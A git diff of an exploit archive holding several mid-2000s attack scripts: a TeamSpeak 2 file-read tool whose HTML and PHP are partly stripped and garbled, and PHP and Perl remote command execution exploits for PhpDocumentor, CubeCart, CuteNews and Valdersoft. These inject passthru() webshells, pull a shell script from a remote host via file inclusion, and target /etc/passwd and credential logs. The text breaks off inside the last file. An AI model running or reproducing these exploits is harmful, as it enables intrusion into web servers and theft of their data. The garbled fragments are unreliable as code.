--- a/platforms/multiple/remote/7760.php
+++ b/platforms/multiple/remote/7760.php
@@ -1,138 +1,138 @@
-
- -
-  ¬ teamspeak hostname or ip, for expamle "ts.antichat.ru" -  ¬ port to TCQquery admin, default 51234 -  ¬ file to read.'; -} - -function info() -{ - echo - '
- for example: - server.log - server.dbs - ../../../../../boot.ini - ../../../../../etc/passwd - ../../../../../usr/local/apache/conf/httpd.conf etc. - brain on ;) - - admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files. - - '; -} - -function head() -{ - echo ' - - -xek_teamspeak2 - - -'; -} - -head(); - -if (!$_GET) -{ - html(); - info(); -} - -if (isset($_GET['go_fuck'])) -{ - $hostname = $_POST['hostname']; - $file = $_POST['file']; - $port = $_POST['port']; - - if (isset($_POST['check_ver'])) - { - echo '
'.check_ver($hostname, 'ver', $port);
-		
-	}
-	
-	if (isset($_POST['parampampam']))
-	{
-		echo '';
-		html();
-		
-	}
-}
-
-?>
-
-# milw0rm.com [2009-01-14]
+
+ +
+  ¬ teamspeak hostname or ip, for expamle "ts.antichat.ru" +  ¬ port to TCQquery admin, default 51234 +  ¬ file to read.'; +} + +function info() +{ + echo + '
+ for example: + server.log + server.dbs + ../../../../../boot.ini + ../../../../../etc/passwd + ../../../../../usr/local/apache/conf/httpd.conf etc. + brain on ;) + + admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files. + + + + + + +
+name="message"></textarea>
diff --git a/platforms/php/webapps/1395.php b/platforms/php/webapps/1395.php index a1d545a8d..4a71851d7 100755 --- a/platforms/php/webapps/1395.php +++ b/platforms/php/webapps/1395.php @@ -1,214 +1,214 @@ -**PhpDocumentor <= 1.3.0 rc4 remote commands execution** - -

-**PhpDocumentor <= 1.3.0 rc4 remote commands execution**

a -script by rgod at -http://rgod.altervista.org

* hostname (ex:www.sitename.com) -

* path (ex: -/phpdocumentor/ or just / )

* specify a command

* remote location ( ex: http://www.somesite -.com, without traling slashes)

specify a port other than 80 (default value)

-send exploit through an -HTTP proxy (ip:port)

'; - -function show($headeri) -{ - $ii=0;$ji=0;$ki=0;$ci=0; - echo ''; - while ($ii <= strlen($headeri)-1){ - $datai=dechex(ord($headeri[$ii])); - if ($ji==16) { - $ji=0; - $ci++; - echo ""; - for ($li=0; $li<=15; $li++) { - echo ""; - } - $ki=$ki+16; - echo ""; - } - if (strlen($datai)==1) { - echo ""; - } - else { - echo " "; - } - $ii++;$ji++; - } - for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { - echo ""; - } - for ($li=$ci*16; $li<=strlen($headeri); $li++) { - echo ""; - } - echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; -} - -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -function sendpacket() //2x speed -{ - global $proxy, $host, $port, $packet, $html, $proxy_regex; - $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); - if ($socket < 0) { - echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) {echo 'Not a valid prozy...'; - die; - } - echo "OK.
"; - echo "Attempting to connect to ".$host." on port ".$port."...
"; - if ($proxy=='') { - $result = socket_connect($socket, $host, $port); - } - else { - $parts =explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $result = socket_connect($socket, $parts[0],$parts[1]); - } - if ($result < 0) { - echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; - } - else { - echo "OK.

"; - $html= ''; - socket_write($socket, $packet, strlen($packet)); - echo "Reading response:
"; - while ($out= socket_read($socket, 2048)) {$html.=$out;} - echo nl2br(htmlentities($html)); - echo "Closing socket..."; - socket_close($socket); - } - } -} - -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.htmlentities($host); die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid prozy...';die; - } - $parts=explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock);echo nl2br(htmlentities($html)); -} - -$host=$_POST[host];$path=$_POST[path]; -$port=$_POST[port]; $CMD=$_POST[CMD]; -$LOCATION=$_POST[LOCATION]; - - -if (($host<>'') and ($path<>'') and ($CMD<>'') and ($LOCATION<>'')) -{ - $port=intval(trim($port)); - if ($port=='') {$port=80;} - if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');} - if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - $host=str_replace("\r\n","",$host); - $path=str_replace("\r\n","",$path); - $CMD=urlencode($CMD); - - $packet="GET ".$p."Documentation/tests/bug-559668.php?cmd=".$CMD."&FORUM[LIB]=".$LOCATION." HTTP/1.1\r\n"; - $packet.="User-Agent: Shareaza v1.x.x.xx\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - if (eregi("HiMaster!",$html)) {echo "Exploit succeeded"; die;} - else {echo "Trying Step 2...
";} - - $packet="GET ".$p."docbuilder/file_dialog.php?cmd=".$CMD."&root_dir=".$LOCATION." HTTP/1.1\r\n"; - $packet.="User-Agent: SnoopRob/x.x\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); - if (eregi("HiMaster!",$html)) {echo "Exploit succeeded"; } - else {echo "Exploit failed...";} -} -else -{echo "Note: on remote location prepare this code in
- http:/[remote_location]/classes/db/PearDb.php/index.html
- and in
- http://[remote_location]/phpDocumentor/common.inc.php/index.html:
"; - echo nl2br(htmlentities(" - - ")); - echo "
Note 2: if magic_quotes_off on target server
- you can truncate location name with a null char, ex.:
- http://[remote_location]/your_file.txt%00

- Fill * required fields, optionally specify a proxy...";} - -?> - -# milw0rm.com [2005-12-29] +**PhpDocumentor <= 1.3.0 rc4 remote commands execution** + +

+**PhpDocumentor <= 1.3.0 rc4 remote commands execution**

a +script by rgod at +http://rgod.altervista.org

* hostname (ex:www.sitename.com) +

* path (ex: +/phpdocumentor/ or just / )

* specify a command

* remote location ( ex: http://www.somesite +.com, without traling slashes)

specify a port other than 80 (default value)

+send exploit through an +HTTP proxy (ip:port)

'; + +function show($headeri) +{ + $ii=0;$ji=0;$ki=0;$ci=0; + echo ''; + while ($ii <= strlen($headeri)-1){ + $datai=dechex(ord($headeri[$ii])); + if ($ji==16) { + $ji=0; + $ci++; + echo ""; + for ($li=0; $li<=15; $li++) { + echo ""; + } + $ki=$ki+16; + echo ""; + } + if (strlen($datai)==1) { + echo ""; + } + else { + echo " "; + } + $ii++;$ji++; + } + for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { + echo ""; + } + for ($li=$ci*16; $li<=strlen($headeri); $li++) { + echo ""; + } + echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; +} + +$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; + +function sendpacket() //2x speed +{ + global $proxy, $host, $port, $packet, $html, $proxy_regex; + $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + if ($socket < 0) { + echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) {echo 'Not a valid prozy...'; + die; + } + echo "OK.
"; + echo "Attempting to connect to ".$host." on port ".$port."...
"; + if ($proxy=='') { + $result = socket_connect($socket, $host, $port); + } + else { + $parts =explode(':',$proxy); + echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; + $result = socket_connect($socket, $parts[0],$parts[1]); + } + if ($result < 0) { + echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; + } + else { + echo "OK.

"; + $html= ''; + socket_write($socket, $packet, strlen($packet)); + echo "Reading response:
"; + while ($out= socket_read($socket, 2048)) {$html.=$out;} + echo nl2br(htmlentities($html)); + echo "Closing socket..."; + socket_close($socket); + } + } +} + +function sendpacketii($packet) +{ + global $proxy, $host, $port, $html, $proxy_regex; + if ($proxy=='') { + $ock=fsockopen(gethostbyname($host),$port); + if (!$ock) { + echo 'No response from '.htmlentities($host); die; + } + } + else { + $c = preg_match($proxy_regex,$proxy); + if (!$c) { + echo 'Not a valid prozy...';die; + } + $parts=explode(':',$proxy); + echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { + echo 'No response from proxy...';die; + } + } + fputs($ock,$packet); + if ($proxy=='') { + $html=''; + while (!feof($ock)) { + $html.=fgets($ock); + } + } + else { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { + $html.=fread($ock,1); + } + } + fclose($ock);echo nl2br(htmlentities($html)); +} + +$host=$_POST[host];$path=$_POST[path]; +$port=$_POST[port]; $CMD=$_POST[CMD]; +$LOCATION=$_POST[LOCATION]; + + +if (($host<>'') and ($path<>'') and ($CMD<>'') and ($LOCATION<>'')) +{ + $port=intval(trim($port)); + if ($port=='') {$port=80;} + if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');} + if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} + $host=str_replace("\r\n","",$host); + $path=str_replace("\r\n","",$path); + $CMD=urlencode($CMD); + + $packet="GET ".$p."Documentation/tests/bug-559668.php?cmd=".$CMD."&FORUM[LIB]=".$LOCATION." HTTP/1.1\r\n"; + $packet.="User-Agent: Shareaza v1.x.x.xx\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + show($packet); + sendpacketii($packet); + if (eregi("HiMaster!",$html)) {echo "Exploit succeeded"; die;} + else {echo "Trying Step 2...
";} + + $packet="GET ".$p."docbuilder/file_dialog.php?cmd=".$CMD."&root_dir=".$LOCATION." HTTP/1.1\r\n"; + $packet.="User-Agent: SnoopRob/x.x\r\n"; + $packet.="Host: ".$host."\r\n"; + $packet.="Connection: Close\r\n\r\n"; + show($packet); + sendpacketii($packet); + if (eregi("HiMaster!",$html)) {echo "Exploit succeeded"; } + else {echo "Exploit failed...";} +} +else +{echo "Note: on remote location prepare this code in
+ http:/[remote_location]/classes/db/PearDb.php/index.html
+ and in
+ http://[remote_location]/phpDocumentor/common.inc.php/index.html:
"; + echo nl2br(htmlentities(" + + ")); + echo "
Note 2: if magic_quotes_off on target server
+ you can truncate location name with a null char, ex.:
+ http://[remote_location]/your_file.txt%00

";
+ Fill * required fields, optionally specify a proxy...";}
+
+?>
+
+# milw0rm.com [2005-12-29]
diff --git a/platforms/php/webapps/1398.pl b/platforms/php/webapps/1398.pl
index fe3dfc999..6ccfb1e0b 100755
--- a/platforms/php/webapps/1398.pl
+++ b/platforms/php/webapps/1398.pl
@@ -1,126 +1,126 @@
-#!/usr/bin/perl
-#
-# cijfer-ccxpl - CubeCart <=3.0.6 Remote Command Execution Exploit
-#
-# Copyright (c) 2005 cijfer
-# All rights reserved.
-#
-## 1. example
-#
-# [cijfer@kalma:/research]$ perl ./cijfer-ccxpl.pl -h www.xxx.com -d
-# [cijfer@www.xxx.com /]$ id;uname -a
-# uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
-# Linux server.xxx.com 2.6.10-1.771_FC2 #1 Mon Mar 28 00:50:14 EST 2005 i686 i686 i386 GNU/Linux
-#
-# [cijfer@www.xxx.com /]$
-#
-## 2. explanation
-#
-# a serious bug was discovered by me in CubeCart 3.0.6 and below which an attacker
-# can remotely execute arbitrary commands via 'includes/orderSuccess.inc.php' where
-# passing input to the 'glob' and 'cart_order_id' variable, we can attain access to
-# passing input to the 'glob[rootDir]' variable, and include a remote execution script
-# to execute arbitrary commands. as usual, this requires 'register_globals' to be
-# enabled in order to successfully do this, otherwise a 403 error will show.
-#
-## 3. the bug
-#
-# this below allows us to bypass the 403 error...
-#
-#
-#
-## 5. the greets
-#
-# kippis to Zodiac, felosi, and odz. also shouts to lethal & hexy
-#
-##
-#
-# $Id: cijfer-ccxpl.pl,v 0.2 2005/12/30 06:02:00 cijfer Exp cijfer $
-
-use Getopt::Std;
-use IO::Socket;
-use URI::Escape;
-
-getopts("h:d:");
-
-$host = $opt_h;
-$dirs = $opt_d;
-$shel = "http://website.com/cmd.txt"; # cmd shell url
-$cmdv = "cmd"; # cmd variable (ex. passthru($_GET[cmd]);)
-$good = 0;
-
-if(!$host||!$dirs)
-{
- print "cijfer-ccxpl.pl by cijfer\n";
- print "usage: $0 -h cijfer.xxx -d /cubecart\r\n";
- print "usage: $0 -h -d \r\n";
- exit();
-}
-
-while()
-{
- print "[cijfer@".$host." 
/]\$ ";
- while()
- {
- $cmds=$_;
- chomp($cmds);
- last;
- }
-
- $string = $dirs;
- $string .= "/includes/orderSuccess.inc.php?";
- $string .= uri_escape($cmdv);
- $string .= "=";
- $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
- $string .= uri_escape($cmds).";echo";
- $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
- $string .= "&glob=1&cart_order_id=1&glob[rootDir]=";
- $string .= $shel;
- $string .= "?";
-
- $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
-
- print $sock "GET $string HTTP/1.1\n";
- print $sock "Host: $host\n";
- print $sock "Accept: */*\n";
- print $sock "Connection: close\n\n";
-
- while($result = <$sock>)
- {
- if($result =~ /^_END_/)
- {
- $good=0;
- }
-
- if($good==1)
- {
- print $result;
- }
-
- if($result =~ /^_START_/)
- {
- $good=1;
- }
- }
-}
-
-# milw0rm.com [2005-12-30]
+#!/usr/bin/perl
+#
+# cijfer-ccxpl - CubeCart <=3.0.6 Remote Command Execution Exploit
+#
+# Copyright (c) 2005 cijfer
+# All rights reserved.
+#
+## 1. example
+#
+# [cijfer@kalma:/research]$ perl ./cijfer-ccxpl.pl -h www.xxx.com -d
+# [cijfer@www.xxx.com /]$ id;uname -a
+# uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
+# Linux server.xxx.com 2.6.10-1.771_FC2 #1 Mon Mar 28 00:50:14 EST 2005 i686 i686 i386 GNU/Linux
+#
+# [cijfer@www.xxx.com /]$
+#
+## 2. explanation
+#
+# a serious bug was discovered by me in CubeCart 3.0.6 and below which an attacker
+# can remotely execute arbitrary commands via 'includes/orderSuccess.inc.php' where
+# passing input to the 'glob' and 'cart_order_id' variable, we can attain access to
+# passing input to the 'glob[rootDir]' variable, and include a remote execution script
+# to execute arbitrary commands. as usual, this requires 'register_globals' to be
+# enabled in order to successfully do this, otherwise a 403 error will show.
+#
+## 3. the bug
+#
+# this below allows us to bypass the 403 error...
+#
+#
+#
+## 5. 
the greets
+#
+# kippis to Zodiac, felosi, and odz. also shouts to lethal & hexy
+#
+##
+#
+# $Id: cijfer-ccxpl.pl,v 0.2 2005/12/30 06:02:00 cijfer Exp cijfer $
+
+use Getopt::Std;
+use IO::Socket;
+use URI::Escape;
+
+getopts("h:d:");
+
+$host = $opt_h;
+$dirs = $opt_d;
+$shel = "http://website.com/cmd.txt"; # cmd shell url
+$cmdv = "cmd"; # cmd variable (ex. passthru($_GET[cmd]);)
+$good = 0;
+
+if(!$host||!$dirs)
+{
+ print "cijfer-ccxpl.pl by cijfer\n";
+ print "usage: $0 -h cijfer.xxx -d /cubecart\r\n";
+ print "usage: $0 -h -d \r\n";
+ exit();
+}
+
+while()
+{
+ print "[cijfer@".$host." /]\$ ";
+ while()
+ {
+ $cmds=$_;
+ chomp($cmds);
+ last;
+ }
+
+ $string = $dirs;
+ $string .= "/includes/orderSuccess.inc.php?";
+ $string .= uri_escape($cmdv);
+ $string .= "=";
+ $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
+ $string .= uri_escape($cmds).";echo";
+ $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
+ $string .= "&glob=1&cart_order_id=1&glob[rootDir]=";
+ $string .= $shel;
+ $string .= "?";
+
+ $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
+
+ print $sock "GET $string HTTP/1.1\n";
+ print $sock "Host: $host\n";
+ print $sock "Accept: */*\n";
+ print $sock "Connection: close\n\n";
+
+ while($result = <$sock>)
+ {
+ if($result =~ /^_END_/)
+ {
+ $good=0;
+ }
+
+ if($good==1)
+ {
+ print $result;
+ }
+
+ if($result =~ /^_START_/)
+ {
+ $good=1;
+ }
+ }
+}
+
+# milw0rm.com [2005-12-30]
diff --git a/platforms/php/webapps/1400.pl b/platforms/php/webapps/1400.pl
index 70c18b05a..efe894cbf 100755
--- a/platforms/php/webapps/1400.pl
+++ b/platforms/php/webapps/1400.pl
@@ -1,163 +1,163 @@
-#!/usr/bin/perl
-#
-# cijfer-cnxpl - CuteNews <=1.4.1 Remote Command Execution
-#
-# Copyright (c) 2005 cijfer
-# All rights reserved.
-#
-## 1. example
-#
-# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
-# [cijfer@www.xxxx.org /]$ id;uname -a
-# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
-# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
-# [cijfer@www.xxxx.org /]$
-#
-## 2. explanation
-#
-# this particular vulnerability is already known (sort of). a
-# bug as exact as this one was found by rgod in CuteNews. the
-# sole difference between his and my bug, are the files that
-# are being exploited. while his was a bug using the following
-# string:
-#
-# show_archives.php?template=../inc/ipban.mdu%00
-#
-# i found my bug in:
-#
-# show_archives.php?template=../inc/categories.mdu%00
-#
-## 3. the bug
-#
-# the bug lies in categories.mdu, located in the /inc/ folder
-# of the cutenews directory.
-#
-# by using the 'template' variable in show_archives.php, we
-# can include any local files. in this case, we're including
-# categories.mdu. why? every .mdu file within the cutenews
-# package has raw PHP code within it, that is not protected
-# like the normal .php files.
-#
-# $template gets sanitized, but can be bypassed depending on
-# php configuration! this is why on some 1.4.0's it works and
-# on some others it does not. it all depends on configuration
-# and whether or not register_globals needs to be on.
-#
-# if(file_exists("$cutepath/data/${template}.tpl")){ require("$cutepath/data/${template}.tpl"); }
-# ...
-#
-# looking into categories.mdu, we notice the following to
-# create our exploit string:
-#
-# if($member_db[1] != 1){ msg("error", "Access Denied", "You don't have permission to edit categories"); }
-# ...
-#
-# elseif($action == "doedit")
-# {
-# ... 
-#
-# cannot write arbitrary php code to $cat_name :(
-#
-# $cat_name = htmlspecialchars(stripslashes($cat_name));
-# ...
-#
-# $cat_icon lacks sanitization :))!
-#
-# fwrite($new_cats, "$catid|$cat_name|$cat_icon|||\n");
-# ...
-#
-# adding together all these elements, it is possible to inject
-# php code into data/category.db.php and from there, use our
-# injected code to either include a remote php shell, or run
-# commands on the system.
-#
-##
-#
-# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $
-
-use IO::Socket;
-use Getopt::Std;
-use URI::Escape;
-
-getopts("h:d:");
-
-$host = $opt_h;
-$dirs = $opt_d;
-$good = 0;
-
-if(!$host)
-{
- print "cijfer-cnxpl.pl by cijfer\n";
- print "usage: $0 -h -d [/directory]\r\n";
- exit();
-}
-
-while()
-{
- print "[cijfer@".$host." /]\$ ";
- while()
- {
- $cmds=$_;
- chomp($cmds);
- last;
- }
-
-if(!$dirs)
-{
- $dirs = "/cutenews";
-}
-
-$string = $dirs;
-$string .= "/show_archives.php?template=../inc/categories.mdu%00";
-$string .= "&member_db[1]=1";
-$string .= "&action=doedit"; #can be changed from 'doedit' to 'add' if no categories exist
-$string .= "&cat_name=cijfer";
-$string .= "&catid=1"; #can be changed to different value if starting catid != 0
-$string .= "&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E";
-
-$cijfer = $dirs;
-$cijfer .= "/data/category.db.php?cij=";
-$cijfer .= uri_escape("echo; ");
-$cijfer .= "%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"; # _START_
-$cijfer .= uri_escape($cmds);
-$cijfer .= "%3B%20%65%63%68%6F%20%5F%45%4E%44%5F"; # _END_
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
-
-print $sock "GET $string HTTP/1.1\n";
-print $sock "Host: $host\n";
-print $sock "Accept: */*\n";
-print $sock "Connection: close\n\n";
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
-
-print $sock "GET $cijfer HTTP/1.1\n";
-print $sock 
"Host: $host\n";
-print $sock "Accept: */*\n";
-print $sock "Connection: close\n\n";
-
-while($result = <$sock>)
-{
- if($sock =~ /^403/)
- {
- print "error: 403\n";
- exit();
- }
- if($result =~ /^_END_/)
- {
- $good=0;
- }
-
- if($good==1)
- {
- print $result;
- }
-
- if($result =~ /^_START_/)
- {
- $good=1;
- }
-}
-}
-
-# milw0rm.com [2006-01-01]
+#!/usr/bin/perl
+#
+# cijfer-cnxpl - CuteNews <=1.4.1 Remote Command Execution
+#
+# Copyright (c) 2005 cijfer
+# All rights reserved.
+#
+## 1. example
+#
+# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
+# [cijfer@www.xxxx.org /]$ id;uname -a
+# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
+# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
+# [cijfer@www.xxxx.org /]$
+#
+## 2. explanation
+#
+# this particular vulnerability is already known (sort of). a
+# bug as exact as this one was found by rgod in CuteNews. the
+# sole difference between his and my bug, are the files that
+# are being exploited. while his was a bug using the following
+# string:
+#
+# show_archives.php?template=../inc/ipban.mdu%00
+#
+# i found my bug in:
+#
+# show_archives.php?template=../inc/categories.mdu%00
+#
+## 3. the bug
+#
+# the bug lies in categories.mdu, located in the /inc/ folder
+# of the cutenews directory.
+#
+# by using the 'template' variable in show_archives.php, we
+# can include any local files. in this case, we're including
+# categories.mdu. why? every .mdu file within the cutenews
+# package has raw PHP code within it, that is not protected
+# like the normal .php files.
+#
+# $template gets sanitized, but can be bypassed depending on
+# php configuration! this is why on some 1.4.0's it works and
+# on some others it does not. it all depends on configuration
+# and whether or not register_globals needs to be on. 
+#
+# if(file_exists("$cutepath/data/${template}.tpl")){ require("$cutepath/data/${template}.tpl"); }
+# ...
+#
+# looking into categories.mdu, we notice the following to
+# create our exploit string:
+#
+# if($member_db[1] != 1){ msg("error", "Access Denied", "You don't have permission to edit categories"); }
+# ...
+#
+# elseif($action == "doedit")
+# {
+# ...
+#
+# cannot write arbitrary php code to $cat_name :(
+#
+# $cat_name = htmlspecialchars(stripslashes($cat_name));
+# ...
+#
+# $cat_icon lacks sanitization :))!
+#
+# fwrite($new_cats, "$catid|$cat_name|$cat_icon|||\n");
+# ...
+#
+# adding together all these elements, it is possible to inject
+# php code into data/category.db.php and from there, use our
+# injected code to either include a remote php shell, or run
+# commands on the system.
+#
+##
+#
+# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $
+
+use IO::Socket;
+use Getopt::Std;
+use URI::Escape;
+
+getopts("h:d:");
+
+$host = $opt_h;
+$dirs = $opt_d;
+$good = 0;
+
+if(!$host)
+{
+ print "cijfer-cnxpl.pl by cijfer\n";
+ print "usage: $0 -h -d [/directory]\r\n";
+ exit();
+}
+
+while()
+{
+ print "[cijfer@".$host." 
/]\$ ";
+ while()
+ {
+ $cmds=$_;
+ chomp($cmds);
+ last;
+ }
+
+if(!$dirs)
+{
+ $dirs = "/cutenews";
+}
+
+$string = $dirs;
+$string .= "/show_archives.php?template=../inc/categories.mdu%00";
+$string .= "&member_db[1]=1";
+$string .= "&action=doedit"; #can be changed from 'doedit' to 'add' if no categories exist
+$string .= "&cat_name=cijfer";
+$string .= "&catid=1"; #can be changed to different value if starting catid != 0
+$string .= "&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E";
+
+$cijfer = $dirs;
+$cijfer .= "/data/category.db.php?cij=";
+$cijfer .= uri_escape("echo; ");
+$cijfer .= "%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"; # _START_
+$cijfer .= uri_escape($cmds);
+$cijfer .= "%3B%20%65%63%68%6F%20%5F%45%4E%44%5F"; # _END_
+
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
+
+print $sock "GET $string HTTP/1.1\n";
+print $sock "Host: $host\n";
+print $sock "Accept: */*\n";
+print $sock "Connection: close\n\n";
+
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
+
+print $sock "GET $cijfer HTTP/1.1\n";
+print $sock "Host: $host\n";
+print $sock "Accept: */*\n";
+print $sock "Connection: close\n\n";
+
+while($result = <$sock>)
+{
+ if($sock =~ /^403/)
+ {
+ print "error: 403\n";
+ exit();
+ }
+ if($result =~ /^_END_/)
+ {
+ $good=0;
+ }
+
+ if($good==1)
+ {
+ print $result;
+ }
+
+ if($result =~ /^_START_/)
+ {
+ $good=1;
+ }
+}
+}
+
+# milw0rm.com [2006-01-01]
diff --git a/platforms/php/webapps/1401.pl b/platforms/php/webapps/1401.pl
index b24031f07..c3973097d 100755
--- a/platforms/php/webapps/1401.pl
+++ b/platforms/php/webapps/1401.pl
@@ -1,111 +1,111 @@
-#!/usr/bin/perl
-#
-# cijfer-vscxpl - Valdersoft Shopping Cart <=3.0 Remote Command Execution Exploit
-#
-# Copyright (c) 2005 cijfer
-# All rights reserved.
-#
-## 1. example
-#
-# [cijfer@kalma:/research]$ ./cijfer-vscxpl.pl -h www.valdersoft.com -d /store
-# [cijfer@www.valdersoft.com /]$ id;uname -a
-# uid=2526(apache) gid=2524(apache) groups=2524(apache), 10004(psaserv)
-# FreeBSD valdersoft.com 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Wed Nov 19 00:35:22 EST 2003
-# tim@temp.atlnetworks.com:/usr/src/sys/compile/PLESK i386
-#
-# [cijfer@www.valdersoft.com /]$
-#
-## 2. explanation
-#
-# various files within 'include\templates\categories' contains unsanitized and undefined
-# variables which can allow remote file inclusion, leading to remote command execution.
-# this can be done by entering a remote url within the 'catalogDocumentRoot' variable.
-#
-## 3. the bug
-#
-# this is obvious _why_ it is dangerous.
-#
-# ...
-# include($catalogDocumentRoot.$catalogDir."include/modules/categories_path.php");
-# ...
-#
-## 4. the php shell
-#
-# this exploit grabs data via regular expression strings. foreign php shell
-# scripts will not work with this exploit. use the following code along with
-# this exploit and put it in 'cmd.txt' or whatever you please:
-#
-#
-#
-##
-#
-# $Id: cijfer-vscxpl.pl,v 0.2 2005/12/30 11:44:00 cijfer Exp cijfer $
-
-use Getopt::Std;
-use IO::Socket;
-use URI::Escape;
-
-getopts("h:d:");
-
-$host = $opt_h;
-$dirs = $opt_d;
-$shel = "http://site.com/cmd.txt"; # cmd shell url
-$cmdv = "cmd"; # cmd variable (ex. passthru($_GET[cmd]);)
-$good = 0;
-
-if(!$host||!$dirs)
-{
- print "cijfer-vscxpl.pl by cijfer\n";
- print "usage: $0 -h cijfer.xxx -d /valdersoft\r\n";
- print "usage: $0 -h -d \r\n";
- exit();
-}
-
-while()
-{
- print "[cijfer@".$host." 
/]\$ ";
- while()
- {
- $cmds=$_;
- chomp($cmds);
- last;
- }
-
- $string = $dirs;
- $string .= "/include/templates/categories/default.php?";
- $string .= uri_escape($cmdv);
- $string .= "=";
- $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
- $string .= uri_escape($cmds).";echo";
- $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
- $string .= "&catalogDocumentRoot=";
- $string .= $shel;
- $string .= "?";
-
- $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
-
- print $sock "GET $string HTTP/1.1\n";
- print $sock "Host: $host\n";
- print $sock "Accept: */*\n";
- print $sock "Connection: close\n\n";
-
- while($result = <$sock>)
- {
- if($result =~ /^_END_/)
- {
- $good=0;
- }
-
- if($good==1)
- {
- print $result;
- }
-
- if($result =~ /^_START_/)
- {
- $good=1;
- }
- }
-}
-
-# milw0rm.com [2006-01-03]
+#!/usr/bin/perl
+#
+# cijfer-vscxpl - Valdersoft Shopping Cart <=3.0 Remote Command Execution Exploit
+#
+# Copyright (c) 2005 cijfer
+# All rights reserved.
+#
+## 1. example
+#
+# [cijfer@kalma:/research]$ ./cijfer-vscxpl.pl -h www.valdersoft.com -d /store
+# [cijfer@www.valdersoft.com /]$ id;uname -a
